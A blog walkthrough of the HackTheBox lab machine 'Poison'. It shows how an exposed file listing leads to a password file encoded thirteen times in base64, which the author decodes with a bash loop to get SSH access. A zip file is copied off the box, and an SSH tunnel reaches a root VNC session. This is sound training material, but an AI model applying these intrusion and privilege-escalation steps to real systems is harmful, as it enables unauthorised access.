imth's blog

HackTheBox - Poison

  • Sep 08, 2018

User

The website seems to be made for testing purposes and has some php files listed that we can test. Hmm, the file listfiles.php sounds promising, let’s visit http://10.10.10.84/listfiles.php.

Array ( 
 [0] => .
 [1] => ..
 [2] => browse.php
 [3] => index.php
 [4] => info.php
 [5] => ini.php
 [6] => listfiles.php
 [7] => phpinfo.php
 [8] => pwdbackup.txt
)

Good! We can list the files in the current directory, there is also one file we didn’t see before, pwdbackup.txt:

This password is secure, it's encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=

It’s a string thats been base64 encoded 13 times, so lets decode it with some bash fun:

#!/bin/bash
cp pwdbackup.txt pwd-1.txt
for i in {1..13}; do
       	cat pwd-$i.txt | base64 -d > pwd-$((i+1)).txt 
done
cat pwd-14.txt
rm pwd-*

We receive the password Charix!2#4%6&8(0! With that password we can also guess the user “charix” and login through ssh. At this point we are able to grab the user flag.

Privesc

We instantly notice a file called secret.zip inside of Charix’ home directory. The zipfile is password protected and we cannot unzip it directly on the box, so we copy the file to our own machine.

On Poison:

% openssl base64 -in secret.zip -out text.b64
% cat text.b64 
UEsDBBQAAQAAACeYOEwneFN3FAAAAAgAAAAGAAAAc2VjcmV0gGG5yvhDaHStR6lI
GGO1REM3nUxQSwECPwAUAAEAAAAnmDhMJ3hTdxQAAAAIAAAABgAkAAAAAAAAACEA
AAAAAAAAc2VjcmV0CgAgAAAAAAABABgAACke8TSV0wGDzbtpjL/TAQApHvE0ldMB
UEsFBgAAAAABAAEAWAAAADgAAAAAAA==

On my machine:

$ vi secret.zip.b64
$ cat secret.zip.b64 | base64 -d > secret.zip
$ unzip secret.zip
Archive:  secret.zip
[secret.zip1] secret password: Charix!2#4%6&8(0
replace secret? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
 extracting: secret

Now what do we do with the secret file? On the box we can see Xvnc and xterm running as root, let’s try to connect to that!

First we have create a tunnel with ssh so we can connect to VNC from the outside:

ssh -L 9000:localhost:5901 charix@10.10.10.84

Next we need a VNC Client like vncviewer to connect to it. Now we have to use the password file secret.

vncviewer -passwd secret localhost:9000

At this point a window should pop open with a terminal running as root!

image

Thats all for the Box Poison!

Search